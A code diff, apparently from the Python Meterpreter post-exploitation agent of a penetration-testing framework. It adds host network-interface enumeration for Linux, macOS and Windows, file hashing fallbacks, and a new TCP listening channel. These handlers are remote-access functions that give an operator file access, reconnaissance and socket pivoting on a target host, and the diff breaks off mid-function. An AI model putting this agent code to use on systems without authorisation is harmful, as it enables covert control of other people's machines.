||||||
|
class IP_ADAPTER_ADDRESSES(ctypes.Structure):
|
||||||
|
_fields_ = [
|
||||||
|
("u", type(
|
||||||
|
'_u_IP_ADAPTER_ADDRESSES',
|
||||||
|
(ctypes.Union,),
|
||||||
|
dict(_fields_ = [
|
||||||
|
("Alignment", ctypes.c_ulonglong),
|
||||||
|
("s", type(
|
||||||
|
'_s_IP_ADAPTER_ADDRESSES',
|
||||||
|
(ctypes.Structure,),
|
||||||
|
dict(_fields_ = [
|
||||||
|
("Length", ctypes.c_ulong),
|
||||||
|
("IfIndex", ctypes.c_uint32)
|
||||||
|
])
|
||||||
|
))
|
||||||
|
])
|
||||||
|
)),
|
||||||
|
("Next", ctypes.c_void_p),
|
||||||
|
("AdapterName", ctypes.c_char_p),
|
||||||
|
("FirstUnicastAddress", ctypes.c_void_p),
|
||||||
|
("FirstAnycastAddress", ctypes.c_void_p),
|
||||||
|
("FirstMulticastAddress", ctypes.c_void_p),
|
||||||
|
("FirstDnsServerAddress", ctypes.c_void_p),
|
||||||
|
("DnsSuffix", ctypes.c_wchar_p),
|
||||||
|
("Description", ctypes.c_wchar_p),
|
||||||
|
("FriendlyName", ctypes.c_wchar_p),
|
||||||
|
("PhysicalAddress", (ctypes.c_uint8 * 8)),
|
||||||
|
("PhysicalAddressLength", ctypes.c_uint32),
|
||||||
|
("Flags", ctypes.c_uint32),
|
||||||
|
("Mtu", ctypes.c_uint32),
|
||||||
|
("IfType", ctypes.c_uint32),
|
||||||
|
("OperStatus", ctypes.c_uint32),
|
||||||
|
("Ipv6IfIndex", ctypes.c_uint32),
|
||||||
|
("ZoneIndices", (ctypes.c_uint32 * 16)),
|
||||||
|
("FirstPrefix", ctypes.c_void_p),
|
||||||
|
("TransmitLinkSpeed", ctypes.c_uint64),
|
||||||
|
("ReceiveLinkSpeed", ctypes.c_uint64),
|
||||||
|
("FirstWinsServerAddress", ctypes.c_void_p),
|
||||||
|
("FirstGatewayAddress", ctypes.c_void_p),
|
||||||
|
("Ipv4Metric", ctypes.c_ulong),
|
||||||
|
("Ipv6Metric", ctypes.c_ulong),
|
||||||
|
("Luid", ctypes.c_uint64),
|
||||||
|
("Dhcpv4Server", SOCKET_ADDRESS),
|
||||||
|
("CompartmentId", ctypes.c_uint32),
|
||||||
|
("NetworkGuid", (ctypes.c_uint8 * 16)),
|
||||||
|
("ConnectionType", ctypes.c_uint32),
|
||||||
|
("TunnelType", ctypes.c_uint32),
|
||||||
|
("Dhcpv6Server", SOCKET_ADDRESS),
|
||||||
|
("Dhcpv6ClientDuid", (ctypes.c_uint8 * 130)),
|
||||||
|
("Dhcpv6ClientDuidLength", ctypes.c_ulong),
|
||||||
|
("Dhcpv6Iaid", ctypes.c_ulong),
|
||||||
|
("FirstDnsSuffix", ctypes.c_void_p)]
|
||||||
|
|
||||||
|
class MIB_IFROW(ctypes.Structure):
|
||||||
|
_fields_ = [("wszName", (ctypes.c_wchar * 256)),
|
||||||
|
("dwIndex", ctypes.c_uint32),
|
||||||
|
("dwType", ctypes.c_uint32),
|
||||||
|
("dwMtu", ctypes.c_uint32),
|
||||||
|
("dwSpeed", ctypes.c_uint32),
|
||||||
|
("dwPhysAddrLen", ctypes.c_uint32),
|
||||||
|
("bPhysAddr", (ctypes.c_uint8 * 8)),
|
||||||
|
("dwAdminStatus", ctypes.c_uint32),
|
||||||
|
("dwOperStaus", ctypes.c_uint32),
|
||||||
|
("dwLastChange", ctypes.c_uint32),
|
||||||
|
("dwInOctets", ctypes.c_uint32),
|
||||||
|
("dwInUcastPkts", ctypes.c_uint32),
|
||||||
|
("dwInNUcastPkts", ctypes.c_uint32),
|
||||||
|
("dwInDiscards", ctypes.c_uint32),
|
||||||
|
("dwInErrors", ctypes.c_uint32),
|
||||||
|
("dwInUnknownProtos", ctypes.c_uint32),
|
||||||
|
("dwOutOctets", ctypes.c_uint32),
|
||||||
|
("dwOutUcastPkts", ctypes.c_uint32),
|
||||||
|
("dwOutNUcastPkts", ctypes.c_uint32),
|
||||||
|
("dwOutDiscards", ctypes.c_uint32),
|
||||||
|
("dwOutErrors", ctypes.c_uint32),
|
||||||
|
("dwOutQLen", ctypes.c_uint32),
|
||||||
|
("dwDescrLen", ctypes.c_uint32),
|
||||||
|
("bDescr", (ctypes.c_char * 256))]
|
||||||
|
|
||||||
|
class MIB_IPADDRROW(ctypes.Structure):
|
||||||
|
_fields_ = [("dwAddr", ctypes.c_uint32),
|
||||||
|
("dwIndex", ctypes.c_uint32),
|
||||||
|
("dwMask", ctypes.c_uint32),
|
||||||
|
("dwBCastAddr", ctypes.c_uint32),
|
||||||
|
("dwReasmSize", ctypes.c_uint32),
|
||||||
|
("unused1", ctypes.c_uint16),
|
||||||
|
("wType", ctypes.c_uint16)]
|
||||||
|
|
||||||
class PROCESSENTRY32(ctypes.Structure):
|
class PROCESSENTRY32(ctypes.Structure):
|
||||||
_fields_ = [("dwSize", ctypes.c_uint32),
|
_fields_ = [("dwSize", ctypes.c_uint32),
|
||||||
("cntUsage", ctypes.c_uint32),
|
("cntUsage", ctypes.c_uint32),
|
||||||
|
@ -48,6 +180,10 @@ class PROCESSENTRY32(ctypes.Structure):
|
||||||
("dwFlags", ctypes.c_uint32),
|
("dwFlags", ctypes.c_uint32),
|
||||||
("szExeFile", (ctypes.c_char * 260))]
|
("szExeFile", (ctypes.c_char * 260))]
|
||||||
|
|
||||||
|
class SID_AND_ATTRIBUTES(ctypes.Structure):
|
||||||
|
_fields_ = [("Sid", ctypes.c_void_p),
|
||||||
|
("Attributes", ctypes.c_uint32)]
|
||||||
|
|
||||||
class SYSTEM_INFO(ctypes.Structure):
|
class SYSTEM_INFO(ctypes.Structure):
|
||||||
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
|
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
|
||||||
("wReserved", ctypes.c_uint16),
|
("wReserved", ctypes.c_uint16),
|
||||||
|
@ -59,15 +195,36 @@ class SYSTEM_INFO(ctypes.Structure):
|
||||||
("dwProcessorType", ctypes.c_uint32),
|
("dwProcessorType", ctypes.c_uint32),
|
||||||
("dwAllocationGranularity", ctypes.c_uint32),
|
("dwAllocationGranularity", ctypes.c_uint32),
|
||||||
("wProcessorLevel", ctypes.c_uint16),
|
("wProcessorLevel", ctypes.c_uint16),
|
||||||
("wProcessorRevision", ctypes.c_uint16),]
|
("wProcessorRevision", ctypes.c_uint16)]
|
||||||
|
|
||||||
class SID_AND_ATTRIBUTES(ctypes.Structure):
|
#
|
||||||
_fields_ = [("Sid", ctypes.c_void_p),
|
# Linux Structures
|
||||||
("Attributes", ctypes.c_uint32),]
|
#
|
||||||
|
class IFADDRMSG(ctypes.Structure):
|
||||||
|
_fields_ = [("family", ctypes.c_uint8),
|
||||||
|
("prefixlen", ctypes.c_uint8),
|
||||||
|
("flags", ctypes.c_uint8),
|
||||||
|
("scope", ctypes.c_uint8),
|
||||||
|
("index", ctypes.c_int32)]
|
||||||
|
|
||||||
##
|
class IFINFOMSG(ctypes.Structure):
|
||||||
# STDAPI
|
_fields_ = [("family", ctypes.c_uint8),
|
||||||
##
|
("pad", ctypes.c_int8),
|
||||||
|
("type", ctypes.c_uint16),
|
||||||
|
("index", ctypes.c_int32),
|
||||||
|
("flags", ctypes.c_uint32),
|
||||||
|
("chagen", ctypes.c_uint32)]
|
||||||
|
|
||||||
|
class NLMSGHDR(ctypes.Structure):
|
||||||
|
_fields_ = [("len", ctypes.c_uint32),
|
||||||
|
("type", ctypes.c_uint16),
|
||||||
|
("flags", ctypes.c_uint16),
|
||||||
|
("seq", ctypes.c_uint32),
|
||||||
|
("pid", ctypes.c_uint32)]
|
||||||
|
|
||||||
|
class RTATTR(ctypes.Structure):
|
||||||
|
_fields_ = [("len", ctypes.c_uint16),
|
||||||
|
("type", ctypes.c_uint16)]
|
||||||
|
|
||||||
#
|
#
|
||||||
# TLV Meta Types
|
# TLV Meta Types
|
||||||
|
@ -135,16 +292,21 @@ TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
|
||||||
##
|
##
|
||||||
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
|
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
|
||||||
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
|
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
|
||||||
|
TLV_TYPE_INTERFACE_MTU = TLV_META_TYPE_UINT | 1402
|
||||||
|
TLV_TYPE_INTERFACE_FLAGS = TLV_META_TYPE_STRING | 1403
|
||||||
|
TLV_TYPE_INTERFACE_INDEX = TLV_META_TYPE_UINT | 1404
|
||||||
|
|
||||||
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
|
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
|
||||||
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
|
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
|
||||||
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
|
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
|
||||||
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
|
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
|
||||||
|
TLV_TYPE_IP_PREFIX = TLV_META_TYPE_UINT | 1424
|
||||||
|
|
||||||
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
|
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
|
||||||
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
|
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
|
||||||
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
|
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
|
||||||
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
|
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
|
||||||
|
TLV_TYPE_IP6_SCOPE = TLV_META_TYPE_RAW | 1434
|
||||||
|
|
||||||
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
|
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
|
||||||
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
|
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
|
||||||
|
@ -290,9 +452,39 @@ ERROR_FAILURE = 1
|
||||||
# errors.
|
# errors.
|
||||||
ERROR_CONNECTION_ERROR = 10000
|
ERROR_CONNECTION_ERROR = 10000
|
||||||
|
|
||||||
|
# Windows Constants
|
||||||
|
GAA_FLAG_SKIP_ANYCAST = 0x0002
|
||||||
|
GAA_FLAG_SKIP_MULTICAST = 0x0004
|
||||||
|
GAA_FLAG_INCLUDE_PREFIX = 0x0010
|
||||||
|
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
|
||||||
|
|
||||||
WIN_AF_INET = 2
|
WIN_AF_INET = 2
|
||||||
WIN_AF_INET6 = 23
|
WIN_AF_INET6 = 23
|
||||||
|
|
||||||
|
# Linux Constants
|
||||||
|
RTM_GETLINK = 18
|
||||||
|
RTM_GETADDR = 22
|
||||||
|
RTM_GETROUTE = 26
|
||||||
|
|
||||||
|
IFLA_ADDRESS = 1
|
||||||
|
IFLA_BROADCAST = 2
|
||||||
|
IFLA_IFNAME = 3
|
||||||
|
IFLA_MTU = 4
|
||||||
|
|
||||||
|
IFA_ADDRESS = 1
|
||||||
|
IFA_LABEL = 3
|
||||||
|
|
||||||
|
def calculate_32bit_netmask(bits):
|
||||||
|
if bits == 32:
|
||||||
|
return 0xffffffff
|
||||||
|
return ((0xffffffff << (32-(bits%32))) & 0xffffffff)
|
||||||
|
|
||||||
|
def cstruct_unpack(structure, raw_data):
|
||||||
|
if not isinstance(structure, ctypes.Structure):
|
||||||
|
structure = structure()
|
||||||
|
ctypes.memmove(ctypes.byref(structure), raw_data, ctypes.sizeof(structure))
|
||||||
|
return structure
|
||||||
|
|
||||||
def get_stat_buffer(path):
|
def get_stat_buffer(path):
|
||||||
si = os.stat(path)
|
si = os.stat(path)
|
||||||
rdev = 0
|
rdev = 0
|
||||||
|
@ -310,20 +502,30 @@ def get_stat_buffer(path):
|
||||||
st_buf += struct.pack('<II', blksize, blocks)
|
st_buf += struct.pack('<II', blksize, blocks)
|
||||||
return st_buf
|
return st_buf
|
||||||
|
|
||||||
def inet_pton(family, address):
|
def netlink_request(req_type):
|
||||||
if hasattr(socket, 'inet_pton'):
|
# See RFC 3549
|
||||||
return socket.inet_pton(family, address)
|
NLM_F_REQUEST = 0x0001
|
||||||
elif has_windll:
|
NLM_F_ROOT = 0x0100
|
||||||
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
|
NLMSG_ERROR = 0x0002
|
||||||
lpAddress = (ctypes.c_ubyte * 28)()
|
NLMSG_DONE = 0x0003
|
||||||
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
|
|
||||||
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
|
sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
|
||||||
raise Exception('WSAStringToAddress failed')
|
sock.bind((os.getpid(), 0))
|
||||||
if family == socket.AF_INET:
|
seq = int(time.time())
|
||||||
return ''.join(map(chr, lpAddress[4:8]))
|
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
|
||||||
elif family == socket.AF_INET6:
|
sfd = os.fdopen(sock.fileno(), 'w+b')
|
||||||
return ''.join(map(chr, lpAddress[8:24]))
|
sfd.write(nlmsg)
|
||||||
raise Exception('no suitable inet_pton functionality is available')
|
responses = []
|
||||||
|
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
||||||
|
while response.type != NLMSG_DONE:
|
||||||
|
if response.type == NLMSG_ERROR:
|
||||||
|
break
|
||||||
|
response_data = sfd.read(response.len - 16)
|
||||||
|
responses.append(response_data)
|
||||||
|
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
||||||
|
sfd.close()
|
||||||
|
sock.close()
|
||||||
|
return responses
|
||||||
|
|
||||||
def resolve_host(hostname, family):
|
def resolve_host(hostname, family):
|
||||||
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
|
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
|
||||||
|
@ -338,8 +540,17 @@ def windll_GetNativeSystemInfo():
|
||||||
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
|
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
|
||||||
return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
|
return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
|
||||||
|
|
||||||
|
def windll_GetVersion():
|
||||||
|
if not has_windll:
|
||||||
|
return None
|
||||||
|
dwVersion = ctypes.windll.kernel32.GetVersion()
|
||||||
|
dwMajorVersion = (dwVersion & 0x000000ff)
|
||||||
|
dwMinorVersion = ((dwVersion & 0x0000ff00) >> 8)
|
||||||
|
dwBuild = ((dwVersion & 0xffff0000) >> 16)
|
||||||
|
return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def channel_create_stdapi_fs_file(request, response):
|
def channel_open_stdapi_fs_file(request, response):
|
||||||
fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||||
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
|
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
|
||||||
if fmode:
|
if fmode:
|
||||||
|
@ -353,7 +564,7 @@ def channel_create_stdapi_fs_file(request, response):
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def channel_create_stdapi_net_tcp_client(request, response):
|
def channel_open_stdapi_net_tcp_client(request, response):
|
||||||
host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
|
host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
|
||||||
port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
|
port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
|
||||||
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
|
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
|
||||||
|
@ -373,7 +584,19 @@ def channel_create_stdapi_net_tcp_client(request, response):
|
||||||
pass
|
pass
|
||||||
if not connected:
|
if not connected:
|
||||||
return ERROR_CONNECTION_ERROR, response
|
return ERROR_CONNECTION_ERROR, response
|
||||||
channel_id = meterpreter.add_channel(sock)
|
channel_id = meterpreter.add_channel(MeterpreterSocketClient(sock))
|
||||||
|
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
||||||
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
|
@meterpreter.register_function
|
||||||
|
def channel_open_stdapi_net_tcp_server(request, response):
|
||||||
|
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '0.0.0.0')
|
||||||
|
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
|
||||||
|
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||||
|
server_sock.bind((local_host, local_port))
|
||||||
|
server_sock.listen(socket.SOMAXCONN)
|
||||||
|
channel_id = meterpreter.add_channel(MeterpreterSocketServer(server_sock))
|
||||||
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
|
@ -675,12 +898,12 @@ def stdapi_fs_ls(request, response):
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_fs_md5(request, response):
|
def stdapi_fs_md5(request, response):
|
||||||
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
|
try:
|
||||||
import md5
|
|
||||||
m = md5.new()
|
|
||||||
else:
|
|
||||||
import hashlib
|
import hashlib
|
||||||
m = hashlib.md5()
|
m = hashlib.md5()
|
||||||
|
except ImportError:
|
||||||
|
import md5
|
||||||
|
m = md5.new()
|
||||||
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||||
m.update(open(path, 'rb').read())
|
m.update(open(path, 'rb').read())
|
||||||
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
|
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
|
||||||
|
@ -722,12 +945,12 @@ def stdapi_fs_separator(request, response):
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_fs_sha1(request, response):
|
def stdapi_fs_sha1(request, response):
|
||||||
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
|
try:
|
||||||
import sha1
|
|
||||||
m = sha1.new()
|
|
||||||
else:
|
|
||||||
import hashlib
|
import hashlib
|
||||||
m = hashlib.sha1()
|
m = hashlib.sha1()
|
||||||
|
except ImportError:
|
||||||
|
import sha
|
||||||
|
m = sha.new()
|
||||||
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||||
m.update(open(path, 'rb').read())
|
m.update(open(path, 'rb').read())
|
||||||
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
|
response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
|
||||||
|
@ -740,6 +963,235 @@ def stdapi_fs_stat(request, response):
|
||||||
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
|
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
|
@meterpreter.register_function
|
||||||
|
def stdapi_net_config_get_interfaces(request, response):
|
||||||
|
if hasattr(socket, 'AF_NETLINK'):
|
||||||
|
interfaces = stdapi_net_config_get_interfaces_via_netlink()
|
||||||
|
elif has_osxsc:
|
||||||
|
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
|
||||||
|
elif has_windll:
|
||||||
|
interfaces = stdapi_net_config_get_interfaces_via_windll()
|
||||||
|
else:
|
||||||
|
return ERROR_FAILURE, response
|
||||||
|
for iface_info in interfaces:
|
||||||
|
iface_tlv = ''
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
|
||||||
|
if 'mtu' in iface_info:
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_MTU, iface_info['mtu'])
|
||||||
|
if 'flags' in iface_info:
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_FLAGS, iface_info['flags'])
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_INTERFACE_INDEX, iface_info['index'])
|
||||||
|
for address in iface_info.get('addrs', []):
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_IP, address[1])
|
||||||
|
if isinstance(address[2], (int, long)):
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_IP_PREFIX, address[2])
|
||||||
|
else:
|
||||||
|
iface_tlv += tlv_pack(TLV_TYPE_NETMASK, address[2])
|
||||||
|
response += tlv_pack(TLV_TYPE_NETWORK_INTERFACE, iface_tlv)
|
||||||
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
|
def stdapi_net_config_get_interfaces_via_netlink():
|
||||||
|
rta_align = lambda l: l+3 & ~3
|
||||||
|
iface_flags = {
|
||||||
|
0x0001: 'UP',
|
||||||
|
0x0002: 'BROADCAST',
|
||||||
|
0x0008: 'LOOPBACK',
|
||||||
|
0x0010: 'POINTTOPOINT',
|
||||||
|
0x0040: 'RUNNING',
|
||||||
|
0x0100: 'PROMISC',
|
||||||
|
0x1000: 'MULTICAST'
|
||||||
|
}
|
||||||
|
iface_flags_sorted = iface_flags.keys()
|
||||||
|
# Dictionaries don't maintain order
|
||||||
|
iface_flags_sorted.sort()
|
||||||
|
interfaces = {}
|
||||||
|
|
||||||
|
responses = netlink_request(RTM_GETLINK)
|
||||||
|
for res_data in responses:
|
||||||
|
iface = cstruct_unpack(IFINFOMSG, res_data)
|
||||||
|
iface_info = {'index':iface.index}
|
||||||
|
flags = []
|
||||||
|
for flag in iface_flags_sorted:
|
||||||
|
if (iface.flags & flag):
|
||||||
|
flags.append(iface_flags[flag])
|
||||||
|
iface_info['flags'] = ' '.join(flags)
|
||||||
|
cursor = ctypes.sizeof(IFINFOMSG)
|
||||||
|
while cursor < len(res_data):
|
||||||
|
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
|
||||||
|
at_len = attribute.len
|
||||||
|
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
|
||||||
|
cursor += rta_align(at_len)
|
||||||
|
|
||||||
|
if attribute.type == IFLA_ADDRESS:
|
||||||
|
iface_info['hw_addr'] = attr_data
|
||||||
|
elif attribute.type == IFLA_IFNAME:
|
||||||
|
iface_info['name'] = attr_data
|
||||||
|
elif attribute.type == IFLA_MTU:
|
||||||
|
iface_info['mtu'] = struct.unpack('<I', attr_data)[0]
|
||||||
|
interfaces[iface.index] = iface_info
|
||||||
|
|
||||||
|
responses = netlink_request(RTM_GETADDR)
|
||||||
|
for res_data in responses:
|
||||||
|
iface = cstruct_unpack(IFADDRMSG, res_data)
|
||||||
|
if not iface.family in (socket.AF_INET, socket.AF_INET6):
|
||||||
|
continue
|
||||||
|
iface_info = interfaces.get(iface.index, {})
|
||||||
|
cursor = ctypes.sizeof(IFADDRMSG)
|
||||||
|
while cursor < len(res_data):
|
||||||
|
attribute = cstruct_unpack(RTATTR, res_data[cursor:])
|
||||||
|
at_len = attribute.len
|
||||||
|
attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
|
||||||
|
cursor += rta_align(at_len)
|
||||||
|
|
||||||
|
if attribute.type == IFA_ADDRESS:
|
||||||
|
nm_bits = iface.prefixlen
|
||||||
|
if iface.family == socket.AF_INET:
|
||||||
|
netmask = struct.pack('!I', calculate_32bit_netmask(nm_bits))
|
||||||
|
else:
|
||||||
|
if nm_bits >= 96:
|
||||||
|
netmask = struct.pack('!iiiI', -1, -1, -1, calculate_32bit_netmask(nm_bits))
|
||||||
|
elif nm_bits >= 64:
|
||||||
|
netmask = struct.pack('!iiII', -1, -1, calculate_32bit_netmask(nm_bits), 0)
|
||||||
|
elif nm_bits >= 32:
|
||||||
|
netmask = struct.pack('!iIII', -1, calculate_32bit_netmask(nm_bits), 0, 0)
|
||||||
|
else:
|
||||||
|
netmask = struct.pack('!IIII', calculate_32bit_netmask(nm_bits), 0, 0, 0)
|
||||||
|
addr_list = iface_info.get('addrs', [])
|
||||||
|
addr_list.append((iface.family, attr_data, netmask))
|
||||||
|
iface_info['addrs'] = addr_list
|
||||||
|
elif attribute.type == IFA_LABEL:
|
||||||
|
iface_info['name'] = attr_data
|
||||||
|
interfaces[iface.index] = iface_info
|
||||||
|
return interfaces.values()
|
||||||
|
|
||||||
|
def stdapi_net_config_get_interfaces_via_osxsc():
|
||||||
|
ds = osxsc.SCDynamicStoreCreate(None, 'GetInterfaceInformation', None, None)
|
||||||
|
entities = []
|
||||||
|
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv4))
|
||||||
|
entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv6))
|
||||||
|
patterns = osxsc.CFArrayCreate(None, entities, len(entities), osxsc.kCFTypeArrayCallBacks)
|
||||||
|
values = osxsc.SCDynamicStoreCopyMultiple(ds, None, patterns)
|
||||||
|
interfaces = {}
|
||||||
|
for key, value in values.items():
|
||||||
|
iface_name = key.split('/')[3]
|
||||||
|
iface_info = interfaces.get(iface_name, {})
|
||||||
|
iface_info['name'] = str(iface_name)
|
||||||
|
if key.endswith('IPv4'):
|
||||||
|
family = socket.AF_INET
|
||||||
|
elif key.endswith('IPv6'):
|
||||||
|
family = socket.AF_INET6
|
||||||
|
else:
|
||||||
|
continue
|
||||||
|
iface_addresses = iface_info.get('addrs', [])
|
||||||
|
for idx in range(len(value['Addresses'])):
|
||||||
|
if family == socket.AF_INET:
|
||||||
|
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), inet_pton(family, value['SubnetMasks'][idx])))
|
||||||
|
else:
|
||||||
|
iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), value['PrefixLength'][idx]))
|
||||||
|
iface_info['addrs'] = iface_addresses
|
||||||
|
interfaces[iface_name] = iface_info
|
||||||
|
for iface_ref in osxsc.SCNetworkInterfaceCopyAll():
|
||||||
|
iface_name = osxsc.SCNetworkInterfaceGetBSDName(iface_ref)
|
||||||
|
if not iface_name in interfaces:
|
||||||
|
iface_type = osxsc.SCNetworkInterfaceGetInterfaceType(iface_ref)
|
||||||
|
if not iface_type in ['Ethernet', 'IEEE80211']:
|
||||||
|
continue
|
||||||
|
interfaces[iface_name] = {'name': str(iface_name)}
|
||||||
|
iface_info = interfaces[iface_name]
|
||||||
|
mtu = osxsc.SCNetworkInterfaceCopyMTU(iface_ref, None, None, None)[1]
|
||||||
|
iface_info['mtu'] = mtu
|
||||||
|
hw_addr = osxsc.SCNetworkInterfaceGetHardwareAddressString(iface_ref)
|
||||||
|
if hw_addr:
|
||||||
|
hw_addr = hw_addr.replace(':', '')
|
||||||
|
hw_addr = hw_addr.decode('hex')
|
||||||
|
iface_info['hw_addr'] = hw_addr
|
||||||
|
ifnames = interfaces.keys()
|
||||||
|
ifnames.sort()
|
||||||
|
for iface_name, iface_info in interfaces.items():
|
||||||
|
iface_info['index'] = ifnames.index(iface_name)
|
||||||
|
return interfaces.values()
|
||||||
|
|
||||||
|
def stdapi_net_config_get_interfaces_via_windll():
|
||||||
|
iphlpapi = ctypes.windll.iphlpapi
|
||||||
|
if not hasattr(iphlpapi, 'GetAdaptersAddresses'):
|
||||||
|
return stdapi_net_config_get_interfaces_via_windll_mib()
|
||||||
|
